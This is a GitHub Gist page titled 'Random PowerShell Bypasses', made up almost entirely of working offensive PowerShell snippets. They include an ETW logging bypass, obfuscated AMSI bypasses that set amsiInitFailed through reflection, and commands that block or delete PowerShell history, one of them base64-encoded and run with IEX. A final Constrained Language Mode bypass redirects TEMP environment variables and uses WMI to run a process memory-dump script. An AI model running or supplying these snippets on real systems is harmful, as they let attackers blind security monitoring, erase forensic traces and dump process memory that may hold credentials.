Last active
March 16, 2024 09:06
-
-
Save reigningshells/a255fcca07465befbcbf4be9cdf67560 to your computer and use it in GitHub Desktop.
Random PowerShell Bypasses
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Logging bypass: | |
| (({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid))) | |
| # AMSI Bypass (old, burned) | |
| sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) | |
| # New AMSI bypass obfuscation: | |
| [ReF]."`A$(echo sse)`mB$(echo L)`Y"."g`E$(echo tty)p`E"(( "Sy{3}ana{1}ut{4}ti{2}{0}ils" -f'iUt','gement.A',"on.Am`s",'stem.M','oma') )."$(echo ge)`Tf`i$(echo El)D"(("{0}{2}ni{1}iled" -f'am','tFa',"`siI"),("{2}ubl{0}`,{1}{0}" -f 'ic','Stat','NonP'))."$(echo Se)t`Va$(echo LUE)"($(),$(1 -eq 1)) | |
| # Neuter Writes to History Log: | |
| Set-PSReadlineOption -HistorySaveStyle SaveNothing | |
| # Encoded version of blocking writes to history | |
| [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('UwBlAHQALQBQAFMAUgBlAGEAZABsAGkAbgBlAE8AcAB0AGkAbwBuACAALQBIAGkAcwB0AG8AcgB5AFMAYQB2AGUAUwB0AHkAbABlACAAUwBhAHYAZQBOAG8AdABoAGkAbgBnAA==')) | IEX | |
| # Delete history logs | |
| rm (Get-PSReadlineOption).HistorySavePath | |
| # Constrained Language Mode Bypass | |
| $command = @" | |
| powershell -c "iex (cat c:\users\public\documents\Invoke-MemoryDump.ps1 | out-string); Invoke-MemoryDump -ProcID 544 -OutputPath 'C:\users\public\documents\out.dmp'" | |
| "@ | |
| $CurrTemp = $env:temp | |
| $CurrTmp = $env:tmp | |
| $TEMPBypassPath = "C:\windows\temp" | |
| $TMPBypassPath = "C:\windows\temp" | |
| Set-ItemProperty -Path 'hkcu:\Environment' -Name Tmp -Value "$TEMPBypassPath" | |
| Set-ItemProperty -Path 'hkcu:\Environment' -Name Temp -Value "$TMPBypassPath" | |
| Invoke-WmiMethod -Class win32_process -Name create -ArgumentList $command | |
| sleep 5 | |
| Set-ItemProperty -Path 'hkcu:\Environment' -Name Tmp -Value $CurrTmp | |
| Set-ItemProperty -Path 'hkcu:\Environment' -Name Temp -Value $CurrTemp | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment